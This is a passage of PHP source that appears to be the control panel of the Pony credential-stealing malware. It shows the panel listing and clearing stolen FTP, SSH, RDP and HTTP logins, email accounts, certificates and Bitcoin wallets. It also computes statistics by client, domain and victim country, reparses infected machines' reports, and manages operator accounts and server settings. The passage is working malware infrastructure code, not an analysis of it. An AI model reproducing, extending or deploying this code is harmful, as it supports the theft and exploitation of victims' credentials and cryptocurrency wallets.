817. // -------------------------------------------------------------------------------------------
818. // Page processing code
819. // -------------------------------------------------------------------------------------------
820.  
821. if ($admin_action == 'ftp')
822. {
823. // ---------------------------------------------------------------------------------------
824. // FTP list
825.  
826. if ($admin_routine == 'clear_ftp')
827. {
828. if ($pony_db->priv_can_delete())
829. {
830. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE url_type='ftp'");
831. clear_floating_offsets($pony_db);
832. }
833. else
834. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
835. }
836. elseif ($admin_routine == 'clear_ssh')
837. {
838. if ($pony_db->priv_can_delete())
839. {
840. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE url_type='ssh'");
841. clear_floating_offsets($pony_db);
842. }
843. else
844. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
845. }
846.  
847. $offset_ftp_list = $pony_db->get_multi_option('offset_ftp_list', 1);
848. $ftp_list = array();
849. $pony_db->get_ftp_list(false, $ftp_list, 10, 'both', $offset_ftp_list[0]);
850.  
851. foreach ($ftp_list as $ftp_item=>$ftp_value)
852. {
853. $ftp_list[$ftp_item]['module'] = $ftp_list[$ftp_item]['ftp_client'];
854. $ftp_list[$ftp_item]['ftp_client'] = module_name_to_client_name($ftp_list[$ftp_item]['ftp_client']);
855. if (!$pony_db->report_id_exists($ftp_list[$ftp_item]['report_id']))
856. {
857. $ftp_list[$ftp_item]['report_id'] = '';
858. }
859. }
860.  
861. if (count($ftp_list))
862. {
863. $first_id = $ftp_list[count($ftp_list)-1]['ftp_id'];
864. } else
865. {
866. $first_id = 0;
867. }
868.  
869. $pony_db->set_multi_option('offset_ftp_list', array($first_id));
870.  
871. apply_data_filters($smarty, false);
872. smarty_assign_continents($smarty);
873.  
874. smarty_assign_common_vars($smarty, $pony_db);
875. $smarty->assign('ftp_list', $ftp_list);
876. $smarty->display('ftp_list.tpl');
877. }
878. if ($admin_action == 'http')
879. {
880. // ---------------------------------------------------------------------------------------
881. // HTTP list
882.  
883. smarty_assign_continents($smarty);
884.  
885. if ($admin_routine == 'clear_http')
886. {
887. if ($pony_db->priv_can_delete())
888. {
889. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE (url_type='http') OR (url_type='https')");
890. clear_floating_offsets($pony_db);
891. }
892. else
893. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
894. }
895.  
896. $offset_http_list = $pony_db->get_multi_option('offset_http_list', 1);
897. $http_list = array();
898. $pony_db->get_http_list(false, $http_list, 10, 'both', $offset_http_list[0]);
899.  
900. foreach ($http_list as $http_item=>$http_value)
901. {
902. $http_list[$http_item]['module'] = $http_list[$http_item]['ftp_client'];
903. $http_list[$http_item]['ftp_client'] = module_name_to_client_name($http_list[$http_item]['ftp_client']);
904. if (!$pony_db->report_id_exists($http_list[$http_item]['report_id']))
905. {
906. $http_list[$http_item]['report_id'] = '';
907. }
908. }
909.  
910. if (count($http_list))
911. {
912. $first_id = $http_list[count($http_list)-1]['ftp_id'];
913. } else
914. {
915. $first_id = 0;
916. }
917.  
918. $pony_db->set_multi_option('offset_http_list', array($first_id));
919.  
920. apply_data_filters($smarty, false, 'http');
921. smarty_assign_continents($smarty);
922.  
923. smarty_assign_common_vars($smarty, $pony_db);
924. $smarty->assign('http_list', $http_list);
925. $smarty->display('http_list.tpl');
926. }
927. else if ($admin_action == 'other')
928. {
929. // ---------------------------------------------------------------------------------------
930. // Other
931. if ($admin_routine == 'clear_cert')
932. {
933. if ($pony_db->priv_can_delete())
934. {
935. $pony_db->clear_table(CPONY_CERT_TABLE);
936. show_smarty_success($smarty);
937. }
938. else
939. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
940. } else if ($admin_routine == 'clear_wallet')
941. {
942. if ($pony_db->priv_can_delete())
943. {
944. $pony_db->clear_table(CPONY_WALLET_TABLE);
945. show_smarty_success($smarty);
946. }
947. else
948. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
949. } else if ($admin_routine == 'clear_rdp')
950. {
951. if ($pony_db->priv_can_delete())
952. {
953. $pony_db->clear_table(CPONY_FTP_TABLE, "WHERE (url_type='rdp')");
954. clear_floating_offsets($pony_db);
955. show_smarty_success($smarty);
956. }
957. else
958. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
959. } else if ($admin_routine == 'clear_email')
960. {
961. if ($pony_db->priv_can_delete())
962. {
963. $pony_db->clear_table(CPONY_EMAIL_TABLE);
964. clear_floating_offsets($pony_db);
965. show_smarty_success($smarty);
966. }
967. else
968. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
969. }
970.  
971. $offset_email_list = $pony_db->get_multi_option('offset_email_list', 1);
972. $email_list = array();
973. $pony_db->get_email_list(false, $email_list, 10, '', $offset_email_list[0]);
974.  
975. foreach ($email_list as $email_item=>$email_value)
976. {
977. $email_list[$email_item]['module'] = $email_list[$email_item]['email_client'];
978. $email_list[$email_item]['email_client'] = module_name_to_client_name($email_list[$email_item]['email_client']);
979. }
980.  
981. if (count($email_list))
982. {
983. $first_id = $email_list[count($email_list)-1]['email_id'];
984. } else
985. {
986. $first_id = 0;
987. }
988.  
989. $pony_db->set_multi_option('offset_email_list', array($first_id));
990. $smarty->assign('email_list', $email_list);
991.  
992. smarty_assign_common_vars($smarty, $pony_db);
993. $smarty->display("other.tpl");
994. }
995. else if ($admin_action == 'stats')
996. {
997. // ---------------------------------------------------------------------------------------
998. // Statistics
999.  
1000. // FTP clients statistics
1001. $ftp_list = array();
1002. $ftp_clients_list = array();
1003. if ($pony_db->get_ftp_clients_stats($ftp_list) && count($ftp_list) > 0)
1004. {
1005. /*
1006. // Show all FTP clients, even with 0 passwords grabbed
1007. foreach ($global_module_list as $module_list_item)
1008. {
1009. // skip system info module
1010. if ($module_list_item[0] == $global_module_list[0][0])
1011. continue;
1012. if (array_key_exists($module_list_item[0], $ftp_list) === false)
1013. {
1014. $ftp_list[$module_list_item[0]] = '0';
1015. }
1016. }*/
1017.  
1018. $sum = 0;
1019.  
1020. foreach ($ftp_list as $count)
1021. $sum += intval($count);
1022.  
1023. foreach ($ftp_list as $ftp_client=>$count)
1024. {
1025. array_push($ftp_clients_list, array(
1026. 'module'=>$ftp_client,
1027. 'name'=>module_name_to_client_name($ftp_client),
1028. 'count'=>$count,
1029. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1030. ));
1031. }
1032. }
1033.  
1034. // HTTP clients statistics
1035. $http_list = array();
1036. $http_clients_list = array();
1037. if ($pony_db->get_http_clients_stats($http_list) && count($http_list) > 0)
1038. {
1039. $sum = 0;
1040.  
1041. foreach ($http_list as $count)
1042. $sum += intval($count);
1043.  
1044. foreach ($http_list as $http_client=>$count)
1045. {
1046. array_push($http_clients_list, array(
1047. 'module'=>$http_client,
1048. 'name'=>module_name_to_client_name($http_client),
1049. 'count'=>$count,
1050. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1051. ));
1052. }
1053. }
1054.  
1055. // E-mail clients statistics
1056. $email_list = array();
1057. $email_clients_list = array();
1058. if ($pony_db->get_email_clients_stats($email_list) && count($email_list) > 0)
1059. {
1060. $sum = 0;
1061.  
1062. foreach ($email_list as $count)
1063. $sum += intval($count);
1064.  
1065. foreach ($email_list as $email_client=>$count)
1066. {
1067. array_push($email_clients_list, array(
1068. 'module'=>$email_client,
1069. 'name'=>module_name_to_client_name($email_client),
1070. 'count'=>$count,
1071. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1072. ));
1073. }
1074. }
1075.  
1076. // HTTP domains statistics
1077. $http_domain_list = array();
1078. $http_domain_stats = array();
1079. if ($pony_db->get_http_domain_stats($http_domain_list) && count($http_domain_list))
1080. {
1081. $sum = 0;
1082.  
1083. foreach ($http_domain_list as $count)
1084. $sum += intval($count);
1085.  
1086. foreach ($http_domain_list as $domain=>$count)
1087. {
1088. array_push($http_domain_stats, array(
1089. 'domain'=>$domain,
1090. 'count'=>$count,
1091. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1092. ));
1093. }
1094. }
1095.  
1096. // Bitcoin clients statistics
1097. $bitcoin_list = array();
1098. $bitcoin_clients_list = array();
1099. if ($pony_db->get_bitcoin_clients_stats($bitcoin_list) && count($bitcoin_list) > 0)
1100. {
1101. $sum = 0;
1102.  
1103. foreach ($bitcoin_list as $count)
1104. $sum += intval($count);
1105.  
1106. foreach ($bitcoin_list as $bitcoin_client=>$count)
1107. {
1108. array_push($bitcoin_clients_list, array(
1109. 'module'=>$bitcoin_client,
1110. 'name'=>module_name_to_client_name($bitcoin_client),
1111. 'count'=>$count,
1112. 'percentage'=>sprintf("%01.2f", $count/$sum*100)
1113. ));
1114. }
1115. }
1116.  
1117. // Country statistics
1118. $country_list = array();
1119. $smarty_country_list = array();
1120. if ($pony_db->get_country_stats($country_list) && count($country_list) > 0)
1121. {
1122. // FTP/HTTP stats
1123. if ($enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
1124. $pony_db->get_all_country_stats($country_ftp_list); // ftp/ssh/rdp/http/https/...
1125. else
1126. $pony_db->get_ftp_country_stats($country_ftp_list); // ftp/ssh only
1127.  
1128. if (is_array($country_ftp_list))
1129. {
1130. foreach ($country_list as $country_name=>$country_value)
1131. {
1132. if (isset($country_ftp_list[$country_name]['ftp_count']))
1133. $country_list[$country_name]['ftp_count'] = $country_ftp_list[$country_name]['ftp_count'];
1134. else
1135. $country_list[$country_name]['ftp_count'] = 0;
1136. }
1137.  
1138. }
1139.  
1140. // E-mail stats
1141. if ($enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
1142. {
1143. $pony_db->get_email_country_stats($country_email_list);
1144. if (is_array($country_email_list))
1145. {
1146. foreach ($country_list as $country_name=>$country_value)
1147. {
1148. if (isset($country_email_list[$country_name]['email_count']))
1149. {
1150. if (!isset($country_list[$country_name]['ftp_count']))
1151. $country_list[$country_name]['ftp_count'] = 0;
1152. $country_list[$country_name]['ftp_count'] += $country_email_list[$country_name]['email_count'];
1153. }
1154. }
1155.  
1156. }
1157. }
1158.  
1159. // Certificates
1160. $pony_db->get_cert_country_stats($country_cert_list);
1161. if (is_array($country_cert_list))
1162. {
1163. foreach ($country_list as $country_name=>$country_value)
1164. {
1165. if (isset($country_cert_list[$country_name]['cert_count']))
1166. {
1167. if (!isset($country_list[$country_name]['ftp_count']))
1168. $country_list[$country_name]['ftp_count'] = 0;
1169. $country_list[$country_name]['ftp_count'] += $country_cert_list[$country_name]['cert_count'];
1170. }
1171. }
1172. }
1173.  
1174. // Wallets
1175. $pony_db->get_wallet_country_stats($country_wallet_list);
1176. if (is_array($country_wallet_list))
1177. {
1178. foreach ($country_list as $country_name=>$country_value)
1179. {
1180. if (isset($country_wallet_list[$country_name]['wallet_count']))
1181. {
1182. if (!isset($country_list[$country_name]['ftp_count']))
1183. $country_list[$country_name]['ftp_count'] = 0;
1184. $country_list[$country_name]['ftp_count'] += $country_wallet_list[$country_name]['wallet_count'];
1185. }
1186. }
1187. }
1188.  
1189. $report_sum = 0;
1190. $ftp_sum = 0;
1191.  
1192. foreach ($country_list as $count_array)
1193. $report_sum += intval($count_array['report_count']);
1194. foreach ($country_list as $count_array)
1195. if (isset($count_array['ftp_count']))
1196. $ftp_sum += intval($count_array['ftp_count']);
1197.  
1198. $geo_ip = new GeoIP();
1199. foreach ($country_list as $country_code=>$count_array)
1200. {
1201. if ($report_sum != 0)
1202. $report_percentage = sprintf("%01.2f", $count_array['report_count']/$report_sum*100);
1203. else
1204. $report_percentage = '';
1205.  
1206. if ($ftp_sum != 0)
1207. $ftp_percentage = sprintf("%01.2f", intval(assign($count_array['ftp_count']))/$ftp_sum*100);
1208. else
1209. $ftp_percentage = '';
1210.  
1211. $country = '';
1212. $flag_url = '';
1213. $country_name = geoip_country_code_to_country_name($geo_ip, $country_code);
1214.  
1215. array_push($smarty_country_list, array("country_name"=>$country_name,
1216. "country_code"=>$country_code,
1217. "ftp_count"=>intval(assign($count_array['ftp_count'])), "report_count"=>$count_array['report_count'],
1218. "report_percentage"=>$report_percentage,
1219. "ftp_percentage"=>$ftp_percentage));
1220. }
1221. }
1222.  
1223. $smarty->assign('http_clients_list', $http_clients_list);
1224. $smarty->assign('bitcoin_clients_list', $bitcoin_clients_list);
1225. $smarty->assign('ftp_clients_list', $ftp_clients_list);
1226. $smarty->assign('email_clients_list', $email_clients_list);
1227. $smarty->assign('country_list', $smarty_country_list);
1228. $smarty->assign('http_domain_list', $http_domain_stats);
1229. $smarty->display('stats.tpl');
1230. }
1231. else if ($admin_action == 'ping')
1232. {
1233. // ---------------------------------------------------------------------------------------
1234. // Domain management
1235. if (!$show_domains || !$pony_db->priv_can_delete())
1236. {
1237. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1238. } else
1239. {
1240. if ($admin_routine == 'add')
1241. {
1242. if (trim(assign($_REQUEST['domain'])) != 'http://')
1243. $pony_db->add_domain(trim(assign($_REQUEST['domain'])));
1244. } else if ($admin_routine == 'delete' && nonempty($_REQUEST['domain_id']))
1245. {
1246. $pony_db->delete_domain(trim(assign($_REQUEST['domain_id'])));
1247. }
1248.  
1249. $domain_list = array();
1250. $pony_db->get_domains($domain_list);
1251.  
1252. $smarty->assign("domain_list", $domain_list);
1253. $smarty->display('domains.tpl');
1254. }
1255. }
1256. else if ($admin_action == 'log')
1257. {
1258. // ---------------------------------------------------------------------------------------
1259. // Logs
1260. if ($admin_routine == 'clear_log')
1261. {
1262. if ($pony_db->priv_can_delete())
1263. {
1264. $pony_db->delete_log_items(CPONY_LOG_TABLE);
1265. clear_floating_offsets($pony_db);
1266. }
1267. else
1268. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1269. }
1270.  
1271. $filter_ip = trim(assign($_REQUEST['filter_ip']));
1272. $filter_hwid = trim(assign($_REQUEST['filter_hwid']));
1273. $filter_notify = trim(assign($_REQUEST['filter_notify']));
1274. $next = trim(assign($_REQUEST['next']));
1275. if (strlen($next) == 0)
1276. $next = '0';
1277. $next = intval($next);
1278. if ($next > 0)
1279. $next--;
1280.  
1281. $max_results = 25; // log lines per page
1282.  
1283. $total_items_count = $pony_db->get_log_row_count_filter($filter_ip, $filter_hwid, $filter_notify);
1284.  
1285. $log_list = array();
1286.  
1287. $pony_db->get_log_list_report_filter($log_list, $next, $max_results, false, $filter_ip, $filter_hwid, $filter_notify);
1288.  
1289. $filter = '';
1290. if (strlen($filter_ip))
1291. $filter .= '&filter_ip='.htmlspecialchars($filter_ip, ENT_QUOTES, 'cp1251');
1292. if (strlen($filter_hwid))
1293. $filter .= '&filter_hwid='.htmlspecialchars($filter_hwid, ENT_QUOTES, 'cp1251');
1294. if (strlen($filter_notify))
1295. $filter .= '&filter_notify='.htmlspecialchars($filter_notify, ENT_QUOTES, 'cp1251');
1296.  
1297. SmartyPaginate::disconnect();
1298. SmartyPaginate::connect();
1299. SmartyPaginate::setLimit($max_results);
1300. SmartyPaginate::setPageLimit(50);
1301. SmartyPaginate::setURL($self_file."?&action=log".$filter);
1302. SmartyPaginate::setTotal($total_items_count);
1303. SmartyPaginate::setPrevText($lang['Previous']);
1304. SmartyPaginate::setNextText($lang['Next']);
1305. SmartyPaginate::assign($smarty);
1306.  
1307. smarty_assign_common_vars($smarty, $pony_db);
1308. $smarty->assign("log_list", $log_list);
1309. $smarty->display('log_list.tpl');
1310. }
1311. else if ($admin_action == 'reports')
1312. {
1313. // ---------------------------------------------------------------------------------------
1314. // Reports
1315. if ($admin_routine == 'clear_reports')
1316. {
1317. if ($pony_db->priv_can_delete())
1318. {
1319. $pony_db->clear_table(CPONY_REPORT_TABLE);
1320. $pony_db->clear_table(CPONY_REPORT_DATA_TABLE);
1321. clear_floating_offsets($pony_db);
1322. } else
1323. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1324. }
1325. if ($admin_routine == 'delete')
1326. {
1327. if ($pony_db->priv_can_delete())
1328. {
1329. $report_id = trim(assign($_REQUEST['report_id']));
1330. $pony_db->report_remove_errors($report_id);
1331. $pony_db->report_remove($report_id);
1332. clear_floating_offsets($pony_db);
1333. } else
1334. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1335. }
1336. elseif ($admin_routine == 'view_report' || $admin_routine == 'reparse' || $admin_routine == 'confirm_delete')
1337. {
1338. // View detailed report information
1339. $log_id = trim(assign($_REQUEST['log_id']));
1340. $report_id = trim(assign($_REQUEST['report_id']));
1341.  
1342. $report_size = $pony_db->get_report_sum_linked("WHERE report_id='".mysql_real_escape_string($report_id)."'");
1343.  
1344. $smarty->assign('report_id', $report_id);
1345. $smarty->assign('report_size', $report_size);
1346. $smarty->assign('log_id', $log_id);
1347.  
1348. $log_item_result = $pony_db->get_log_item($log_id);
1349. $report_item_result = $pony_db->get_report_item($report_id);
1350.  
1351. if ($pony_db->state && is_array($report_item_result))
1352. {
1353. $report_item_result['report_source_ip_country_code'] = geo_ip_country_code($report_item_result['report_source_ip']);
1354. $report_item_result['report_source_ip_country_name'] = geo_ip_country_name($report_item_result['report_source_ip']);
1355. }
1356. $smarty->assign('report', $report_item_result);
1357. $smarty->assign('log_item', $log_item_result);
1358. $smarty->display('view_report.tpl');
1359.  
1360. if ($pony_db->state && is_array($report_item_result))
1361. {
1362. echo "<p id='wait_report_data'><span class='wait'></span></p>";
1363.  
1364. my_flush();
1365.  
1366. if ($admin_routine == 'reparse')
1367. {
1368. $ftp_count_before_reparse = $pony_db->get_report_linked_passwords_count($report_id);
1369. $cert_count_before_reparse = $pony_db->get_table_row_count(CPONY_CERT_TABLE);
1370. $wallet_count_before_reparse = $pony_db->get_table_row_count(CPONY_WALLET_TABLE);
1371. $email_count_before_reparse = $pony_db->get_table_row_count(CPONY_EMAIL_TABLE);
1372.  
1373. $report = new report_parser($pony_report_options);
1374. $parse_result = $report->process_report($report_item_result['data'], $pony_db_report_password);
1375. if ($parse_result)
1376. {
1377. if ($enable_http_mode)
1378. $url_list_array = array_merge($report->ftp_lines, $report->http_lines);
1379. else
1380. $url_list_array = $report->ftp_lines;
1381.  
1382. $url_list_array = array_merge($url_list_array, $report->rdp_lines);
1383.  
1384. if ($enable_email_mode)
1385. {
1386. $email_lines = $report->email_lines;
1387. } else
1388. {
1389. $email_lines = null;
1390. }
1391.  
1392. $pony_db->update_parsed_report($report_id, $report->report_os_name, $report->report_is_win64, $report->report_is_admin,
1393. $report->report_hwid, $report->report_version_id, $url_list_array, null, $report->cert_lines, $report->wallet_lines, $email_lines);
1394. if (!count($report->log->log_lines))
1395. {
1396. $pony_db->report_remove_errors($report_id);
1397. }
1398. }
1399. $smarty->assign('parse_result', $parse_result);
1400. $smarty->assign('parse_new_ftp', $pony_db->get_report_linked_passwords_count($report_id)-$ftp_count_before_reparse
1401. + $pony_db->get_table_row_count(CPONY_CERT_TABLE)-$cert_count_before_reparse
1402. + $pony_db->get_table_row_count(CPONY_WALLET_TABLE)-$wallet_count_before_reparse
1403. + $pony_db->get_table_row_count(CPONY_EMAIL_TABLE)-$email_count_before_reparse);
1404. clear_floating_offsets($pony_db);
1405. }
1406.  
1407. // enable debug mode
1408. global $global_verbose_log, $global_allow_all_ftp;
1409. $old_global_verbose_log = $global_verbose_log;
1410. $old_global_allow_all_ftp = $global_allow_all_ftp;
1411.  
1412. $global_verbose_log = true;
1413. $global_allow_all_ftp = true;
1414.  
1415. $report = new report_parser($pony_report_options);
1416. $parse_result = $report->process_report($report_item_result['data'], $pony_db_report_password);
1417.  
1418. $log = $report->log->log_lines;
1419. $log_list = array();
1420. foreach ($log as $log_list_item)
1421. {
1422. list($log_line, $log_extra) = $log_list_item;
1423. if (strpos($log_line, 'NOTIFY_NEW_HTTP:') !== false)
1424. {
1425. if ($enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
1426. {
1427. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
1428. }
1429. } else if (strpos($log_line, 'NOTIFY_NEW_EMAIL:') !== false)
1430. {
1431. if ($enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
1432. {
1433. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
1434. }
1435. } else
1436.  
1437. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
1438.  
1439. }
1440.  
1441. $smarty->assign('log_list', $log_list);
1442. $smarty->display('debug_report.tpl');
1443.  
1444. echo '<script type="text/javascript">
1445. //<![CDATA[
1446. $("#wait_report_data").hide();
1447. //]]>
1448. </script>';
1449.  
1450. // revert debug mode change
1451. $global_verbose_log = $old_global_verbose_log;
1452. $global_allow_all_ftp = $old_global_allow_all_ftp;
1453. }
1454. }
1455.  
1456. if ($admin_routine != 'view_report' && $admin_routine != 'reparse' && $admin_routine != 'confirm_delete')
1457. {
1458. $filter_string = trim(assign($_REQUEST['filter_string']));
1459. $filter_ip = trim(assign($_REQUEST['filter_ip']));
1460. $filter_hwid = trim(assign($_REQUEST['filter_hwid']));
1461. $filter_nonparsed = trim(assign($_REQUEST['filter_nonparsed']));
1462. $filter_has_passwords = trim(assign($_REQUEST['filter_has_passwords']));
1463. $next = trim(assign($_REQUEST['next']));
1464. if (strlen($next) == 0)
1465. $next = '0';
1466. $next = intval($next);
1467.  
1468. if ($next > 0)
1469. $next--;
1470.  
1471. $total_items_count = $pony_db->get_report_row_count_filter($filter_ip, $filter_hwid, $filter_nonparsed, $filter_has_passwords, $filter_string);
1472. $max_results = 25;
1473.  
1474. $report_list = array();
1475. $pony_db->get_report_list_filter($report_list, $next, $max_results, $filter_ip, $filter_hwid, $filter_nonparsed, $filter_has_passwords, $filter_string);
1476. $geo_ip = new GeoIP();
1477.  
1478. foreach ($report_list as $report_list_item => $report_list_value)
1479. {
1480. if (isset($report_list[$report_list_item]['report_country']) && strlen($report_list[$report_list_item]['report_country']))
1481. {
1482. $report_list[$report_list_item]['report_country_name'] = geoip_country_code_to_country_name($geo_ip, $report_list[$report_list_item]['report_country']);
1483. } else
1484. {
1485. $report_list[$report_list_item]['report_country_name'] = '';
1486. }
1487. }
1488.  
1489. $filter = '';
1490. if (strlen($filter_string))
1491. $filter .= '&filter_string='.htmlspecialchars($filter_string, ENT_QUOTES, 'cp1251');
1492. if (strlen($filter_ip))
1493. $filter .= '&filter_ip='.htmlspecialchars($filter_ip, ENT_QUOTES, 'cp1251');
1494. if (strlen($filter_hwid))
1495. $filter .= '&filter_hwid='.htmlspecialchars($filter_hwid, ENT_QUOTES, 'cp1251');
1496.  
1497. if (strlen($filter_nonparsed))
1498. $filter .= '&filter_nonparsed='.htmlspecialchars($filter_nonparsed, ENT_QUOTES, 'cp1251');
1499. elseif (strlen($filter_has_passwords))
1500. $filter .= '&filter_has_passwords='.htmlspecialchars($filter_has_passwords, ENT_QUOTES, 'cp1251');
1501.  
1502. SmartyPaginate::disconnect();
1503. SmartyPaginate::connect();
1504. SmartyPaginate::setURL($self_file."?action=reports".$filter);
1505. SmartyPaginate::setTotal($total_items_count);
1506. SmartyPaginate::setLimit($max_results);
1507. SmartyPaginate::setPageLimit(50);
1508.  
1509. SmartyPaginate::setPrevText($lang['Previous']);
1510. SmartyPaginate::setNextText($lang['Next']);
1511. SmartyPaginate::assign($smarty);
1512.  
1513. smarty_assign_common_vars($smarty, $pony_db);
1514. $smarty->assign("report_list", $report_list);
1515. $smarty->display('report_list.tpl');
1516. }
1517. }
1518. else if ($admin_action == 'admin')
1519. {
1520. // ---------------------------------------------------------------------------------------
1521. // User management
1522.  
1523. if ($admin_routine == 'rebuild_tables')
1524. {
1525. if ($pony_db->priv_is_admin())
1526. {
1527. if ($pony_db->drop_table(CPONY_FTP_TABLE) && $pony_db->drop_table(CPONY_REPORT_TABLE) && $pony_db->drop_table(CPONY_REPORT_DATA_TABLE) &&
1528. $pony_db->drop_table(CPONY_LOG_TABLE) && $pony_db->drop_table(CPONY_CERT_TABLE) && $pony_db->drop_table(CPONY_WALLET_TABLE) && $pony_db->drop_table(CPONY_EMAIL_TABLE) &&
1529. $pony_db->drop_table(CPONY_DOMAINLIST_TABLE) &&
1530. $pony_db->create_data_tables()
1531. && $pony_db->state)
1532. show_smarty_success($smarty);
1533. else
1534. show_smarty_error($smarty);
1535. clear_floating_offsets($pony_db);
1536. } else
1537. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1538. }
1539. elseif ($admin_routine == 'optimize_tables')
1540. {
1541. if ($pony_db->priv_is_admin())
1542. {
1543. if ($pony_db->optimize_table(CPONY_FTP_TABLE) && $pony_db->optimize_table(CPONY_REPORT_TABLE) && $pony_db->optimize_table(CPONY_REPORT_DATA_TABLE) && $pony_db->optimize_table(CPONY_DOMAIN_TABLE) &&
1544. $pony_db->optimize_table(CPONY_LOG_TABLE) && $pony_db->optimize_table(CPONY_USER_TABLE) && $pony_db->optimize_table(CPONY_CERT_TABLE) && $pony_db->optimize_table(CPONY_WALLET_TABLE) && $pony_db->optimize_table(CPONY_EMAIL_TABLE) &&
1545. $pony_db->optimize_table(CPONY_DOMAINLIST_TABLE)
1546. && $pony_db->state)
1547. show_smarty_success($smarty);
1548. else
1549. show_smarty_error($smarty);
1550. clear_floating_offsets($pony_db);
1551. } else
1552. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1553. }
1554. elseif ($admin_routine == 'delete')
1555. {
1556. if ($pony_db->priv_is_admin())
1557. {
1558. if ($pony_db->delete_user(trim(assign($_REQUEST['user_id']))))
1559. show_smarty_success($smarty);
1560. else
1561. show_smarty_error($smarty);
1562. } else
1563. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1564. } elseif ($admin_routine == 'add')
1565. {
1566. $priv = trim(assign($_REQUEST['privileges']));
1567. $new_login = trim(assign($_REQUEST['new_login']));
1568. $new_password = trim(assign($_REQUEST['new_password']));
1569.  
1570. if ($priv != 'user_all')
1571. $priv = 'user_view_only';
1572.  
1573. if ($pony_db->priv_is_admin())
1574. {
1575. if ($pony_db->add_user($new_login, $new_password, $priv))
1576. show_smarty_success($smarty);
1577. else
1578. show_smarty_error($smarty);
1579. } else
1580. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1581. } else if ($admin_routine == 'edit')
1582. {
1583. $user_id = trim(assign($_REQUEST['user_id']));
1584. $priv = trim(assign($_REQUEST['privileges']));
1585. $new_password = trim(assign($_REQUEST['new_password']));
1586.  
1587. if ($new_password == 'current_HASH_value')
1588. $new_password = '';
1589.  
1590. if ($priv != 'user_all')
1591. $priv = 'user_view_only';
1592.  
1593. if ($pony_db->priv_is_admin())
1594. {
1595. if ($pony_db->update_user($user_id, $new_password, $priv))
1596. show_smarty_success($smarty);
1597. else
1598. show_smarty_error($smarty);
1599. } else
1600. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1601. } else if ($admin_routine == 'update_server_settings')
1602. {
1603. // Server settings
1604. if ($pony_db->priv_is_admin())
1605. {
1606. $report_password = trim(assign($_REQUEST['report_password']));
1607. $sftp_user = trim(assign($_REQUEST['sftp_user']));
1608. if (!strlen($sftp_user)) $sftp_user = '0';
1609. $sftp_port = trim(assign($_REQUEST['sftp_port']));
1610. if (!strlen($sftp_port)) $sftp_port = '';
1611. $sftp_protocol = trim(assign($_REQUEST['sftp_protocol']));
1612. if (!strlen($sftp_protocol)) $sftp_protocol = '';
1613.  
1614. if ($pony_db->set_option('report_password', $report_password) &&
1615. $pony_db->set_option('sftp_user', $sftp_user) &&
1616. $pony_db->set_option('sftp_port', $sftp_port) &&
1617. $pony_db->set_option('sftp_protocol', $sftp_protocol)
1618. )
1619. show_smarty_success($smarty);
1620. else
1621. show_smarty_error($smarty);
1622. } else
1623. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
1624. } else if ($admin_routine == 'change_password')
1625. {
1626. $current_password = trim(assign($_REQUEST['current_password']));
1627. $new_password = trim(assign($_REQUEST['new_password']));
1628. $confirm_password = trim(assign($_REQUEST['confirm_password']));
1629.  
1630. if ($pony_db->check_password($current_password))
1631. {
1632. if ($new_password == $confirm_password)
1633. {
1634. if (strlen($new_password))
1635. {
1636. if ($pony_db->change_password($new_password))
1637. show_smarty_success($smarty);
1638. else
1639. show_smarty_error($smarty, '', '?action=admin&amp;routine=change_pass_form');
1640. } else
1641. show_smarty_error($smarty, 'ERR_EMPTY_PASSWORD', '?action=admin&amp;routine=change_pass_form');
1642. } else
1643. show_smarty_error($smarty, 'ERR_PASSWORD_MISMATCH', '?action=admin&amp;routine=change_pass_form');
1644. } else
1645. show_smarty_error($smarty, 'ERR_WRONG_PASSWORD', '?action=admin&amp;routine=change_pass_form');
1646. }
1647.  
1648. if ($admin_routine == 'edit_form')
1649. {
1650. $user_id = trim(assign($_REQUEST['user_id']));
1651. if ($pony_db->priv_is_admin())
1652. {
1653. $user_data = $pony_db->get_user_data($user_id);
1654. if (is_array($user_data) && $user_data && $pony_db->priv_is_user($user_data['privileges']))
1655. {
1656. $smarty->assign('user_data', $user_data);
1657. }
1658. }
1659. }
1660.  
1661. $user_list = array();
1662. if ($pony_db->priv_is_admin())
1663. {
1664. $pony_db->get_user_list($user_list);
1665. $smarty->assign('report_password', $pony_db_report_password);
1666.  
1667. $smarty->assign('sftp_user', assign($pony_report_options['sftp_user']));
1668. $smarty->assign('sftp_port', assign($pony_report_options['sftp_port']));
1669. $smarty->assign('sftp_protocol', assign($pony_report_options['sftp_protocol']));
1670. }
1671.  
1672. $smarty->assign('user_list', $user_list);
1673. $smarty->display('management.tpl');
1674. }
